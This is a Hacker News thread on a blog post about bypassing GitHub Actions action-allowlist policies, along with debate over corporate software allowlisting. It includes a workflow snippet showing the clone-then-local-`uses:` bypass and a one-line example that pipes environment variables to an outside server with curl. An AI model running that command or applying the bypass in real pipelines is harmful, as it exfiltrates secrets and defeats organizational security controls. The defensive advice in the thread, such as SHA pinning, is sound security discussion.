236 points by woodruffw 2 days ago | 25 comments
kj4ips 2 days ago
This is a prime example of "If you make an unusable secure system, the users will turn it into an insecure usable one."

If someone is actively subverting a control like this, it probably means that the control has morphed from a guardrail into a log across the tracks.

Somewhat in the same vein as AppLocker & co. Almost everyone says you should be using it, but almost no one does, because it takes a massive amount of effort just to understand what "acceptable software" is across your entire org.

welshwelsh 1 day ago
Nobody outside of the IT security bubble thinks that using AppLocker is a sensible idea.

Companies have no business telling their employees which specific programs they can and cannot run to do their jobs, that's an absurd level of micromanagement.

neilv 1 day ago
> Companies have no business telling their employees which specific programs they can and cannot run to do their jobs, that's an absurd level of micromanagement.

I'm usually on the side of empowering workers, but I believe sometimes the companies do have business saying this.

One reason is that much of the software industry has become a batpoop-insane slimefest of privacy (IP) invasion, as well as grossly negligent security.

Another reason is that the company may be held liable for license terms of the software.

Another reason is that the company may be held liable for illegal behavior of the software (e.g., if the software violates some IP of another party).

Every piece of software might expose the company to these risks. And maybe disproportionately so, if software is being introduced by the "I'm gettin' it done!" employee, rather than by someone who sees vetting for the risks as part of their job.

janstice 1 day ago
For example, if someone installs the wrong version of Oracle Java on a VM in our farm, the licensing cost is seven figures, as they want to charge per core that it could conceivably run on - this would be career-limiting for a number of people at once.
kstrauser 22 hours ago
Or VirtualBox’s extensions which make it usable. Those are free to download but could make you an audit target.
janstice 11 hours ago
Or even Docker Desktop, which is a bunch of $$ that no one expects (and I think Microsoft is still recommending it in the WSL docs).
josefx 21 hours ago
Is there still a reason to use VirtualBox?
kstrauser 21 hours ago
IMO, no. Maybe inertia from people who learned it long ago and stopped looking at the alternatives.
lelandbatey 1 day ago
Developers are going to write code to do things for them, such as small utility programs for automating work. Each custom program is a potentially brand new binary, never seen before by the security auditing software. Does every program written by every dev have to be cleared? Is it best in such a system to get an interpreter cleared so I can use that to run whatever scripts I need?
degamad 1 day ago
If I have an internal developer in such a scenario, then what makes most sense to me is to issue them a code-signing certificate or equivalent, and whitelist anything signed by that certificate[1], combined with logging and periodic auditing to detect abuse.

[1] <https://learn.microsoft.com/en-us/windows/security/applicati...>

viraptor 1 day ago
> Does every program written by every dev have to be cleared?

No, that's not how things are implemented normally, exactly because they wouldn't work.

gabeio 1 day ago
> No, that's not how things are implemented normally, exactly because they wouldn't work.

I used to work for a gov't contractor. I wrote a ~10 line golang http server, just because at the time golang was still new (this was years ago) and I wanted to try it. Not even 2 minutes later I got a call from the IT team asking a bunch of questions about why I was running that program (the http server, not golang). I agree the practice is dumb, but there are definitely companies who have it set up that way.

viraptor 1 day ago
So running it wasn't prevented for you, and new apps listening on the network trigger notifications that the IT checks on immediately. That sounds like a reasonable policy.
macintux 1 day ago
Around 1998 I snagged an abandoned 486 and installed Linux on it for use at work; the corporate software I used the most, a ticketing system, could be run using X from a Solaris server. I don't remember what I did for Lotus Notes.

Anyway, the IT department spotted it but since I was using SMB it thought it was just another Windows server. No one ever checked up on it despite being plugged into the corporate network.

This was a Fortune 500 company; things have changed a wee bit since then.

shanipribadi 1 day ago
Had something similar happen a few years back... basically the Go binaries I compiled would get deleted every time I tried to run them. Usually just downloading a newer version of the Go compiler and recompiling with that solved it (I think they got flagged because they were compiled with an older version of the Go compiler with known vulnerabilities). Every time it happened I think IT security got a notification, because they would reach out to me afterwards. The few times upgrading to the latest Go version didn't work (false positives), I would just name the binary something like "Dude, wake up" or "dude, I need this to get whitelisted", and do the compile-run-binary_got_deleted cycle 10-20 times, effectively paging the IT security guy until they reached out and whitelisted things for me :-D.
xmprt 1 day ago
This is a strawman argument. If a developer writes code that does something malicious then it's on the developer. If they install a program then the accountability is a bit fuzzier. It's partly on the developer, partly on security (for allowing an unprivileged user to do malicious/dangerous things even unknowingly), and partly on IT (for allowing the unauthorized program to run without any verification).
lelandbatey 1 day ago
It's not a straw man; I'm not trying to deflect liability. Of course a developer running malicious code they wrote is responsible for the outcomes.

I am pointing out that if every unique binary never before run/approved is blocked, then no developer will be able to build and then run the software they are paid to write, since them developing it modifies said software into a new and never before seen sequence of bits.

OP may not have meant to say that "it's good to have an absolute allowlist of executable signatures and block everything else", but that is how I interpreted the initial claim and I am merely pointing out that such a system would be more than inconvenient, it'd make the workflow of editing and then running software nearly impossible.

TheNewsIsHere 1 day ago
Your premise assumes there are policies and technologies in place that restrict what a developer can do.

This is often the case, although I’ve very rarely seen environments as restrictive as what you describe being enforced on developers.

Typically developer user accounts and assigned devices are in slightly less restrictive policy groupings, or are given access to some kind of remote build/test infrastructure.

Of course companies need the option to control what software is run on their infrastructure. There are an endless stream of reasons and examples for that. Up-thread there’s a great example of what happens when you let folks install Oracle software without guardrails. Businesses are of course larger and more complex than their developers and have needs beyond their developers.

What matters here is implementation and policy management. You want those to be balanced between audience needs and business needs.

It’s also worth mentioning that plenty of developers have no clue what they’re doing with computers outside their particular area of expertise.

rainonmoon 1 day ago
It's a straw man in that you're establishing an inherently facile and ridiculous scenario just to knock it down. A scenario that, as others have demonstrated, is not grounded in any logical reality. "Nobody mentioned this imaginary horrible system I just thought of, but if they had, it sure would be terrible" is quite a hill to die on.
zmgsabst 1 day ago
Developers are generally given specific environments to run code, which aren’t their laptops — eg, VMs in a development environment.

The goal isn’t to stop a developer from doing something malicious, but to add a step to the chain for hackers to do something malicious: they need to pwn the devbox from the developer laptop before they can pivot to, e.g., internal data systems.

kstrauser 22 hours ago
In my experience, that’s rare. Everywhere I’ve worked had devs working on code directly on their laptops.
zmgsabst 15 hours ago
My experience is the opposite:

I haven’t worked somewhere we ran code locally in a long, long time. Your IDE is local, but the testing is remote — typically in an environment where you can match the runtime environment more closely (eg, ensuring the same dependencies, access to cloud resources, etc).

tough 13 hours ago
isn't that just CI?

does that mean you will never compile it or build it locally?

don't 99% of people just use Docker nowadays to handle all that environment matching?

nradov 1 day ago
That level of micromanagement can be quite sensible depending on the employee role. It's not needed for developers doing generic software work without any sensitive data. But if the employee is, let's say, a nurse doing medical chart review at an insurance company then there is absolutely no need for them to use anything other than specific approved programs. Allowing use of random software greatly increases the potential attack surface area, and in the worst case could result in something like a malware penetration and/or HIPAA privacy violation.
bigfatkitten 1 day ago
Anyone who’s been sued by Oracle for not paying for Java SE runtime licences thinks it’s an outstanding idea.

https://itwire.com/guest-articles/guest-opinion/is-an-oracle...

Security practitioners are big fans of application whitelisting for a reason: Your malware problems pretty much go away if malware cannot execute in the first place.

The Australian Signals Directorate for example has recommended (and more recently, mandated) application whitelisting on government systems for the past 15 years or so, because it would’ve prevented the majority of intrusions they’ve investigated.

https://nsarchive.gwu.edu/sites/default/files/documents/5014...

viraptor 1 day ago
AppLocker is effectively an almost perfect solution to ransomware (on the employee desktops, anyway). You can plug lots of random holes all day long, or just whitelist what can be run in the first place. Ask M&S management today whether they would prefer to keep working with paper systems for another month, or to have dealt with AppLocker.
moooo99 1 day ago
> Companies have no business telling their employees which specific programs they can and cannot run to do their jobs, that's an absurd level of micromanagement.

This is a lovely take if your business runs exclusively on FOSS, on-premise software, but it's a recipe for some hefty bills from software vendors due to people violating licensing conditions.

kstrauser 22 hours ago
> Companies have no business telling their employees which specific programs they can [run]

Agreed.

> and cannot run

I strongly disagree. I think those controls are great for denylists. For example, almost no one needs to run a BitTorrent client on their work laptops. (I said almost. If you’re one of them, make a case to your IT department.) Why allow it? Its presence vastly increases the odds of someone downloading porn (risk: sexual harassment) or warez (risks: malware, legal issues) with almost no upside to the company. I’m ok with a company denylisting those.

I couldn’t care less if you want to listen to Apple Music or Spotify while you work. Go for it. Even though it’s not strictly work-related, it makes happier employees with no significant downside. Want to use Zed instead of VSCode? Knock yourself out. I have no interest in maintaining an allowlist of vetted software. That’s awful for everyone involved. I absolutely don’t want anyone running even a dev version of anything Oracle in our non-Oracle shop, though, and tools to prevent that are welcome.

protocolture 1 day ago
>Companies have no business telling their employees which specific programs they can and cannot run to do their jobs, that's an absurd level of micromanagement.

Yet so many receptionists think that the application attached to the email sent by couriercompany@hotmail.com is a reasonable piece of software to run. Curious.

samplatt 1 day ago
False dichotomy. The manager of the receptionist, or the head of their department, can decide what's appropriate for their job and dictate this to IT, and then they can lock it down.

At my work currently IT have the first say and final say on all software, regardless of what it does or who is using it. It's an insane situation. Decisions are being made without any input from anyone even in the department of the users using the software... you know... the ones that actually make the company money...

davkan 1 day ago
No, it’s unreasonable for end users and non-technical managers to simply dictate to IT what software is to be installed on corporate devices. They can submit requests to IT with a business justification, which should be approved if it can be accommodated.

Maybe your employer’s IT department is in the habit of saying no without a proper attempt to accommodate, which can be a problem, but the solution is not to put the monkeys in charge of the zoo.

At my old job we had upper management demanding exceptions to office modern auth so they could use their preferred email apps. We denied that, there was no valid business justification that outweighed the security risk of bypassing MFA.

We then allowed a single exception to the policy for one of our devs as they were having issues with Outlook’s plaintext support when submitting patches to the LKML. Clear and obvious business justification without an alternative gets rubber stamped.

Security is a balance that can go too far in either direction. Your workstations probably don’t need to be air gapped, and susan from marketing probably shouldn’t be able to install grammarly.

samplatt 11 hours ago
>No, it’s unreasonable for end users and non technical managers to simply dictate to IT

Again, false dichotomy. It's possible to meet in the middle, collaborate and discuss technical requirements. It's just that that rarely happens.

Our software (built by us, with regular code reviews and yearly external security audits, internal-use-only amongst electrical engineers and computer-science guys) regularly gets disabled or removed by IT by accident, without warning, and it's usually a few days before it's re-enabled or able to be reinstalled, since the tiny IT dept is forced to rely on external agencies to control their whitelisting software.

Your "monkeys in charge of the zoo" metaphor is in full effect at my workplace, but in this case, the monkeys are IT and their security theater.

davkan 10 hours ago
> The manager of the receptionist, or the head of their department, can decide what's appropriate for their job and dictate this to IT, and then they can lock it down.

You said exactly that.

Again, maybe your IT team is garbage, I don’t really care to litigate your issue with them. I specifically said IT should accommodate requests when possible and not be overzealous when saying no.

What you previously suggested is that stakeholders should give their demands to IT and that IT should figure out how to make it happen. Doesn’t sound like collaboration to me.

In my experience end users and management are very rarely aware of the requirements placed upon IT to ensure the security of company infrastructure when it comes to passing audits, whether that's for cyber insurance, CMMC compliance, or whatever else.

It’s plainly obvious that products don’t exist to sell without developers or engineers. But you can’t sell your product to customers if they require SOC and you don’t have it or if your entire infrastructure gets ransomwared.

I’ve had to tell very intelligent and hard working people that if I accommodated their request the government would no longer buy products from our company.

samplatt 10 hours ago
>What you previously suggested is that is that stakeholders should give their demands to IT and that IT should figure out how to make it happen. Doesn’t sound like collaboration to me.

That's fair; I did make it sound pretty one-sided there.

protocolture 16 hours ago
>At my work currently IT have the first say and final say on all software, regardless of what it does or who is using it.

Yeah, but software isn't software.

Like I have a customer with users that just randomly started using VPN software to manage their client sites. VPN software that exposes the user machine directly to uncontrolled networks. This causes risks in both directions, because their clients run things like datacenters and power stations. Increases security risks for their business, and increases security risks for their customers, not to mention liability.

IT should be neutral, but IT done right is guided by best practice. IT is ultimately responsible and accountable for security and function. You can't be responsible and accountable without control, or you exist just to be beaten up when shit goes sideways.

>the ones that actually make the company money...

Making the company money in an uncontrolled fashion is just extra distance to fall. If you ship a fantastic product with a massive supply chain induced vuln that destroys your clients there was no point in making that money in the first place.

solumos 2 days ago
The implied fix to the “unusable secure system” is forking the checkout action to your org and referencing it there.
hiatus 1 day ago
That's not a fix though, is it? Git tools are already on the runner. You could check out code from public repos using the CLI, and you could hardcode a token into the workflow if you wanted to access a private repo (assuming the malicious internal user doesn't have admin privileges to add a secret).
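
Roughly, the bypass described in the post looks like this in a workflow (the repo and path here are illustrative; cloning into the workspace is what lets the relative `uses:` path resolve, and the policy filter only sees a "local" action):

    jobs:
      build:
        runs-on: ubuntu-latest
        steps:
          # Fetch the blocked third-party action with plain git instead of `uses:`
          - run: git clone --depth 1 https://github.com/actions/checkout "$GITHUB_WORKSPACE/.tmp/checkout"
          # Then run the very same code via a local path reference,
          # which the allowlist treats as first-party
          - uses: ./.tmp/checkout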
monster_truck 2 days ago
Had these exact same thoughts while I was configuring a series of workflows and scripts to get around the multiple unjustified and longstanding restrictions on what things are allowed to happen when.

That sinking feeling when you search for how to do something and all of the top results are issues that were opened over a decade ago...

It is especially painful trying to use github to do anything useful at all after being spoiled by working exclusively from a locally hosted gitlab instance. I gave up on trying to get things to cache correctly after a few attempts of following their documentation, it's not like I'm paying for it.

Was also very surprised to see that the recommended/suggested default configuration that runs CodeQL had burned over 2600 minutes of actions in just a day of light use, nearly doubling the total I had from weeks of sustained heavy utilization. Who's paying for that??

EatFlamingDeath 5 hours ago
I've been saying for years that GitHub Actions is alpha software.
Already__Taken 1 day ago
I'm baffled you can't clone internal/private repos with anything other than a developer PAT. They have a UI to share access for workflows, let cloning use that...
notpushkin 1 day ago
SSH also works, but I’d love to be able to just use git-credential-oauth [0] like for any other repo.

[0]: https://github.com/hickford/git-credential-oauth

throwaway52176 1 day ago
I use GitHub apps for this, it’s cumbersome but works.
Arbortheus 19 hours ago
Use a GitHub app, that’s what it’s for.
saghm 1 day ago
It used 1.8 days of time to run for a single day? I'm less curious about who's paying for it than who's _using_ it on your repo, because I can't even imagine having an average of almost two people scanning a codebase every single minute of the day.
heelix 1 day ago
Not the OP, but a poorly behaving repo can turn and burn for six hours on every PR, rather than the handful of minutes one would expect. It happens - but usually that sort of thing should be spotted and fixed. More often than not, something is trying to pull artifacts and timing out rather than it being a giant monorepo.
monster_truck 21 hours ago
Have you looked at the default configuration? It runs any time there is a push to main.
TheTaytay 1 day ago
I don’t understand the risk honestly.

Anyone who can commit code to the repo can already do anything in GitHub Actions. This security measure was never designed to mitigate a developer doing something malicious. Whether they clone another action into the repo or write custom scripts themselves, I don't see how GitHub's measures could protect against that.

woodruffw 1 day ago
A mitigation for this exact policy mechanism is included in the post.

(The point is not directly malicious introductions: it's supply chain risk in the form of engineers introducing actions/reusable workflows that are themselves malleable/mutable/subject to risk. A policy that claims to do that should in fact do it, or explicitly document its limitations.)

hk1337 1 day ago
I haven't tested this, but the main risk I can see is users creating PRs on public repositories with actions that run on pull request.
1oooqooq 23 hours ago
If your unprotected PR job can have side effects besides accessing the public repo and returning a boolean pass/fail status, what hope is there?
throwaway290 21 hours ago
any job can have side effects so there is no hope indeed
SchemaLoad 1 day ago
Companies that care about this kind of thing usually have the CI config on another repo from the actual code so you can't just rewrite it to deploy your dev branch straight to prod.
SamuelAdams 1 day ago
The risk is simple enough. GitHub Enterprise allows admins to configure a list of actions to allow or deny. Ideally these actions are published in the GitHub Marketplace.

The idea is that the organization does not trust these third-parties, therefore they disable their access.

However this solution bypasses those lists by cloning open-source actions directly into the runner. At that point it’s just running code, no different from if the maintainers wrote a complex action themselves.

x0x0 1 day ago
The risk is the same reason we don't allow any of our servers to make outgoing network connections except to a limited list of hosts, e.g. backend servers can talk to the gateway, queue / databases, and an approved list of domains for APIs, and nothing else.

The same guard helps prevent both accidents (not just maliciousness) and security breaches. If code somehow gets onto our systems but we prevent most outbound connections, exfiltrating is much harder.

Yes, people do code review, but stuff slips through. See e.g. Google switching one of their core libs that did mkdir via a shell to run mkdir -p (tada! now every invocation had better understand shell escaping rules). That made it through code review. People are imperfect; telling your network "no outbound connections (except for this small list)" is much closer to perfect.

paulddraper 1 day ago
Well…you’re right.

The dumb thing is GitHub offers “action policies” pretending they actually do something.

hk1337 2 days ago
This is why I avoid using non-official actions where possible and always set a version for the action.

We had a contractor that used some random action to ssh files to the server, and referenced master as the version to boot. First, uploading files and running commands over ssh isn't that difficult; second, the action owner could easily add code to save private keys and information to another server.

I am a bit confused on the "bypass" though. Wouldn't the adversary need push access to the repository to edit the workflow file? So, the portion that needs hardening is ensuring the wrong people do not have access to push files to the repository?

On public repositories I could see this being an issue if they do it in a section of the workflow that is run when a PR is created. Private repositories, you should take care with who you give access.

gawa 1 day ago
> This is why I avoid using non-official actions where possible and always set a version for the action.

Those are good practices. I would add that pinning the version (tag) is not enough, as we learned with the tj-actions/changed-files incident. We should pin the commit SHA [0]. GitHub states this in their official documentation [1] as well:

> Pin actions to a full length commit SHA

> Pin actions to a tag only if you trust the creator

[0] https://www.stepsecurity.io/blog/harden-runner-detection-tj-...

[1] https://docs.github.com/en/actions/security-for-github-actio...
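
For illustration, the difference looks roughly like this (the SHA below is a made-up placeholder, not a real actions/checkout commit):

    # Tag reference: convenient, but the tag can be moved after you reviewed it
    - uses: actions/checkout@v4
    # Full-length commit SHA: immutable; keep the tag in a trailing comment for readability
    - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567  # v4.x.y (placeholder SHA)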

jand 1 day ago
> I am a bit confused on the "bypass" though. Wouldn't the adversary need push access to the repository to edit the workflow file? So, the portion that needs hardening is ensuring the wrong people do not have access to push files to the repository?

I understand it that way, too. But: Having company-wide policies in place (regarding actions) might be misunderstood/used as a security measure for the company against malicious/sloppy developers.

So documenting or highlighting the behaviour helps the devops guys avoid a false sense of security. Not much more.

XCabbage 1 day ago
I don't see the vulnerability. In fact, I think considering this a problem at all is ridiculous.

Obviously it's impossible to block all ways of "bypassing" the policy. If you are a developer who has already been entrusted with the ability to make your GitHub Actions workflows run arbitrary code, then OF COURSE you can make it run the code of some published action, even if it's just by manual copy and paste. This fact doesn't need documenting because it's trivially obvious that it could not possibly be any other way.

Nor does it follow from this that the existence of the policy and the limited automatic enforcement mechanism is pointless and harmful. Instead of thinking of the enforcement mechanism as a security control designed to outright prevent a malicious dev from including code from a malicious action, instead think of it more like a linting rule: its purpose is to help the developer by bringing the organisation's policy on third party actions to the dev's attention and pointing out that what they are trying to do breaks it.

If they decide to find a workaround at that point (which of course they CAN do, because there's no feasible way to constrain them from doing so), that's an insubordination issue, just like breaking any other policy. Unless his employer has planted a chip in his brain, an employee can also "bypass" the sexual harassment policy "in the dumbest way possible" - just walk up to Wendy from HR and squeeze her tits! There is literally no technical measure in place to make it physically impossible for him do so. Is the sexual harassment policy therefore also worse than nothing, and is it a problem that the lack of employee brain chips isn't documented?

crabbone 20 hours ago
Yes and no.

The problem of audit of third-party code is real. Especially because of the way GitHub allows embedding it in users' code: it's not centralized, doesn't require signatures / authentication.

But, I think, the real security-minded approach here should be at the container infrastructure level. I.e. security policies should apply to things like the container network, in a way similar to security groups in popular cloud providers, or to executing particular system calls, or accessing filesystem paths.

Restrictions on the level of what actions can be mentioned in the "manifest" are just a bad approach that's not going to stop anyone.

OptionOfT 1 day ago
We forked the actions as a submodule, and then pointed the uses to that directory.

That way we were still tracking the individual commits which we approved as a team.

Now there is an interesting dichotomy. On one hand PMs want us to leverage GitHub Actions to build out stuff more quickly using pre-built blocks, but on the other hand security has no capacity or interest to whitelist actions (not to mention that the whitelist is limited to 100 actions, as per the article).

That said, even pinning GitHub actions to a sha256 isn't perfect for container actions, as they can refer to an image tag, and the contents of that tag can be changed: https://docs.github.com/en/actions/sharing-automations/creat...

E.g. I publish an action with code like

   runs:
     using: 'docker'
     image: 'docker://optionoft/actions-tool:v3.0.0'
You use the action, and pin it to the SHA of this commit.

I get hacked, and a hacker publishes a new version of optionoft/actions-tool:v3.0.0

You wouldn't even get a Dependabot update PR.

danudey 23 hours ago
You can sign images, and then theoretically validate those signatures; if an image changes it no longer matches the signature.

Optionally, you can tell your action to reference the docker image by sha256 hash also, in which case it's effectively immutable.

opello 1 day ago
Maybe there's a future Dependabot feature to create FYI issues when in-use tags change?
wereHamster 1 day ago
Scorecard (ossf/scorecard) is easy to integrate (it's a CLI tool, or you run it as a GitHub action); one of the checks it performs is "Pinned-Dependencies": https://github.com/ossf/scorecard/blob/main/docs/checks.md#p.... Checks that fail generate a security alert under Security -> Code scanning.
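
A rough sketch of wiring it up as a scheduled workflow (action inputs here are from memory, so double-check them against the ossf/scorecard-action docs, and pin the actions by SHA in practice):

    name: scorecard
    on:
      schedule:
        - cron: '0 6 * * 1'
    permissions: read-all
    jobs:
      analysis:
        runs-on: ubuntu-latest
        permissions:
          security-events: write   # needed to upload results to code scanning
        steps:
          - uses: actions/checkout@v4
          - uses: ossf/scorecard-action@v2
            with:
              results_file: results.sarif
              results_format: sarif
          - uses: github/codeql-action/upload-sarif@v3
            with:
              sarif_file: results.sarif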
OptionOfT 1 day ago
Is it transitive?

> The check works by looking for unpinned dependencies in Dockerfiles, shell scripts, and GitHub workflows which are used during the build and release process of a project.

Does it detect an unpinned reference (e.g. a Docker tag) inside a pinned dependency?

fkyoureadthedoc 1 day ago
This doesn't seem like a big deal to be honest.

My main problem with the policy and how it's implemented at my job is that the ones setting the policies aren't the ones impacted by them, and never consult people who are. Our security team tells our GitHub admin team that we can't use 3rd party actions.

Our GitHub admin team says sure, sounds good. They don't care, because they don't use actions, and in fact they don't deliver anything at all. The security team also delivers nothing, so they don't care. Combined, these teams' crowning achievement is buying GitHub Enterprise and moving it back and forth between cloud and on-prem 3 times in the last 7 years.

As a developer, I'll read the action I want to use, and if it looks good I just clone the code and upload it into our own org/repo. I'm already executing a million npm modules in the same context that do god knows what. If anyone complains, it's getting hit by the same static/dynamic analysis tools as the rest of the code and dependencies.

mook 1 day ago
It sounds like reading the code and forking it (therefore preventing malicious updates) totally satisfies the intent behind the policy, then.

My company has a similar whitelist of actions, with a list of third-party actions that were evaluated and rejected. A lot of the rejected stuff seems to be some sort of helper to make a release, which pretty much has a blanket suggestion to use the `gh` CLI already on the runners.

clysm 1 day ago
I’m not seeing the security issue here. Arbitrary code execution leads to arbitrary code execution?

Seems like policies are impossible to enforce in general on what can be executed, so the only recourse is to limit secret access.

Is there a demonstration of this being able to access/steal secrets of some sort?

mystifyingpoi 1 day ago
> Seems like policies are impossible to enforce

The author addresses exactly that: "ineffective policy mechanisms are worse than missing policy mechanisms, because they provide all of the feeling of security through compliance while actually incentivizing malicious forms of compliance."

And I totally agree. It is so abundant. "Yes, we are in compliance with all the strong password requirements, strictly speaking there is one strong password for every single admin user for all services we use, but that's not in the checklist, right?"

dijksterhuis 1 day ago
It's less of a "use this to do nasty shit to a bunch of unsuspecting victims" one, and more of a "people can get around your policies when you actually need policies that limit your users".

1. BigEnterpriseOrg central IT dept click the tick boxes to disable outside actions because <INSERT SECURITY FRAMEWORK> compliance requires not using external actions [0]

2. BigBrainedDeveloper wants to use ExternalAction, so uses the method documented in the post because they have a big brain

3. BigEnterpriseOrg is no longer compliant with <INSERT SECURITY FRAMEWORK> and, more importantly, the central IT dept have zero idea this is happening without continuously inspecting all the CI workflows for every team they support and signing off on all code changes [1]

That's why someone else's point of "you're supposed to fork the action into your organisation" is a solution if disabling local `uses:` is added as an option in the tick boxes -- the central IT dept have visibility over what's being used and by whom if BigBrainedDeveloper can ask for ExternalAction to be forked into the BigEnterpriseOrg GH organisation. Central IT dept's involvement is now just reviewing the codebase, forking it, and maintaining updates.
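
i.e. roughly this, using the hypothetical names from above (and ideally pinned to a reviewed commit):

    steps:
      # blocked by the org allowlist:
      # - uses: external-author/ExternalAction@v1
      # reviewed fork that central IT owns, sees, and keeps updated:
      - uses: BigEnterpriseOrg/ExternalAction@<sha-of-reviewed-commit>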

NOTE: This is not a panacea against all things that go against <INSERT SECURITY FRAMEWORK> compliance (downloading external binaries etc). But it would be an easy gap getting closed.

----

[0]: or something, i dunno, plenty of reasons enterprise IT depts do stuff that frustrates internal developers

[1]: A sure-fire way to piss off every single one of your internal developers.

bob1029 1 day ago
I feel like GitHub's CI/CD offering is too "all-in" now. Once we are at a point where the SCM tool is a superset of AWS circa 2010, we probably need to step back and consider alternatives.

A more ideal approach could be to expose a simple rest API or webhook that allows for the repo owner to integrate external tooling that is better suited for the purpose of enforcing status checks.

I would much rather write CI/CD tooling in something like python or C# than screw around with yaml files and weird shared libraries of actions. You can achieve something approximating this right now, but you would have to do it by way of GH Actions to some extent.

PRs are hardly latency sensitive, so polling a REST API once every 60 seconds seems acceptable to me. This is essentially what we used to do with Jenkins, except we'd just poll the repo head instead of some weird API.

masklinn 1 day ago
> A more ideal approach could be to expose a simple rest API or webhook that allows for the repo owner to integrate external tooling that is better suited for the purpose of enforcing status checks.

That... has existed for years? https://docs.github.com/en/rest?apiVersion=2022-11-28

That was the only thing available before github actions. That was also the only thing available if you wanted to implement the not rocket science principle before merge queues.

It's hard to beat free tho, especially for OSS maintainership.

And GHA gives you concurrency for which you'd otherwise have to maintain an orchestrator (or a completely bespoke solution); just create multiple jobs or workflows.

And you don't need to deal with tokens to send statuses with. And you get all the logs and feedback in the git interface rather than having to BYO again. And you can actually have PRs marked as merged when you rebased or squashed them (a feature request which is now in middle school: https://github.com/isaacs/github/issues/2)

> PRs are hardly latency sensitive, so polling a REST API once every 60 seconds seems acceptable to me.

There is nothing to poll: https://docs.github.com/en/webhooks/types-of-webhooks

korm 1 day ago
GitHub has both webhooks and an extensive API. What you are describing is entirely doable, nothing really requires GitHub Actions as far as I know.

Most people opt for it for convenience. There's a balance you can strike between all the yaml and shared actions, and running your own scripts.

sureglymop 1 day ago
I don't understand GitHub's popularity in the first place... You have git as the interoperable version control "protocol", but then slap proprietary issue, PR, CI and project management features on top that one can't bring along when migrating away? At that stage what is even the point of it being built on git? Also, for all that is great about git, I don't think it's the best version control system we could have at all. I wish we'd do some serious wheel reinventing here.
bob1029 1 day ago
What do you think a more ideal VCS would look like?
hiatus 2 days ago
That the policy can be "bypassed" by a code change doesn't seem so severe. If you are not reviewing changes to your CI/CD workflows all hope is lost. Your code could be exfiltrated, secrets stolen, and more.
woodruffw 2 days ago
The point of the post is that review is varied in practice: if you’re a large organization you should be reviewing the code itself for changes, but I suspect many orgs aren’t tracking every action (and every version of every action) introduced in CI/CD changes. That’s what policies are useful for, and why bypasses are potentially dangerous.

Or as an intuitive framing: if you can understand the value of branch protection and secret pushing policies for helping your junior engineers, the same holds for your CI/CD policies.

hiatus 1 day ago
The problem is not related to tracking every action or version in CI/CD changes. Right now, you can just curl a binary and run that. How is that any different from the exploit here? I guess people may have had a false sense of security if they had implemented those policies, but I would posit those people didn't really understand their CI/CD system if they thought those policies alone would prevent arbitrary code execution.
woodruffw 1 day ago
I think it's a difference in category; pulling random binaries from the Internet is obviously not good, but it's empirically mostly done in a pointwise manner. Actions, on the other hand, are pulled from a "marketplace", are subject to automatic bumps via things like Dependabot and Renovate, can be silently rewritten thanks to tag mutability, etc.

Clearly in an ideal world runners would be hermetic. But I think the presence of other sources of non-hermeticity doesn't justify a poorly implemented policy feature on GitHub's part.

solumos 2 days ago
“We only allow actions published by our organization and reusable workflows”

and

“We only allow actions published by our organization and reusable workflows OR ones that are manually downloaded from an outside source”

are very very different policies

hiatus 1 day ago
But there is no policy preventing external downloads in general, is there? I can curl a random script from a malicious website, too.
internobody 2 days ago
It's not simply a matter of review; depending on your setup these bypasses could be run before anyone even has eyes on the changes if your CI is triggered on push or on PR creation.
jadamson 2 days ago
`pull_request_target` (which has access to secrets) runs in the context of the destination branch, so any malicious workflow would need to have already been committed.

GitHub has a page on this:

https://securitylab.github.com/resources/github-actions-prev...
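
For context, a sketch of how the two triggers differ (two alternatives shown side by side, not one file; the dangerous pattern is in the comment):

    # `pull_request` runs the workflow as defined on the PR head:
    # untrusted, so fork PRs get no secrets and a read-only token.
    on: pull_request

    # `pull_request_target` runs the workflow as defined on the base branch,
    # with secrets available. It becomes dangerous only if that trusted
    # workflow then checks out and executes the PR head, e.g.:
    #   - uses: actions/checkout@v4
    #     with:
    #       ref: ${{ github.event.pull_request.head.sha }}
    on: pull_request_target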

rawling 2 days ago
But similarly, couldn't you just write harmful stuff straight into the action itself?
mystifyingpoi 1 day ago
You definitely could, but it is more nuanced than that. You really don't want to be seen doing `env | curl -X POST -d @- http://myserver.cn` in a company repository. But using a legitimately named action doesn't look too suspicious.
b0a04gl 5 hours ago
It's blind to the actual execution path. Anyone with push access can run whatever they want anyway, and the fact that it only scans static uses: entries just means teams will start pulling stuff in manually. All of this should've been obvious from the beginning.
throwaway889900 2 days ago
Not only can you yourself manually check out a specific repo, but if you have submodules and do a recursive checkout, it's also possible to pull in other security nightmares from places you never expected now. That would be one complicated attack to pull off though, chain of compromised workflows haha
ghusto 2 days ago
> world’s dumbest policy bypass: instead of doing uses: actions/checkout@v4, the user can git clone (or otherwise fetch) the actions/checkout repository into the runner’s filesystem, and then use uses: ./path/to/checkout to run the very same action

Good lord.

This is akin to saying "Instead of doing `apt-get install <PACKAGE>`, one can bypass the apt policies by downloading the package and running `dpkg -i <PACKAGE>`."

woodruffw 2 days ago
I think a salient difference is that apt policies apply to apt, whereas GitHub goes to some lengths to document GitHub Actions policies as applying to `uses:` clauses writ large.

(But also: in a structural sense, if a system did have `apt` policies that were intended to prevent dependency introduction, then such a system should prevent that kind of bypass. That doesn't mean that the bypass is life-or-death, but it's a matter of hygiene and misuse prevention.)

gawa 1 day ago
> whereas GitHub goes to some lengths to document GitHub Actions policies as applying to `uses:` clauses

If it were phrased like this then you would be right. The docs would give a false sense of security, would be misleading. So I went to check, but I didn't find such an assertion in the linked docs (please let me know if I missed it) [0]

So I agree with the commenter above (and GitHub) that "editing the GitHub Action to add steps that download a script and run it" is not a fundamental flaw of a system designed to do exactly that: run commands as instructed by the user.

Overall we should always ask ourselves: what's the threat model here? If anyone can edit the GitHub Action, then we can make it do a lot of things, and this "GitHub Action Policy" filter toggle is the last of our worries. The only way to make the CI/CD pipeline secure (especially since the CD part usually has access to the outside world) is to prevent people from editing and running anything they want in it. In the case of GitHub Actions, that means restricting users' access to the repository itself.

[0] https://blog.yossarian.net/2025/06/11/github-actions-policie...

woodruffw 1 day ago
That's from here[1].

I suppose there's room for interpretation here, but I think an intuitive scan of "Allowing select actions and reusable workflows to run" is that the contrapositive ("not allowed actions and reusable workflows will not run") also holds. The trick in the post violates that contrapositive.

I think people are really getting caught up on the code execution part of this, which is not really the point. The point is that a policy needs to be encompassing to have its intended effect, which in the case of GitHub Actions is presumably to allow large organizations/companies to inventory their CI/CD dependencies and make globally consistent, auditable decisions about them.

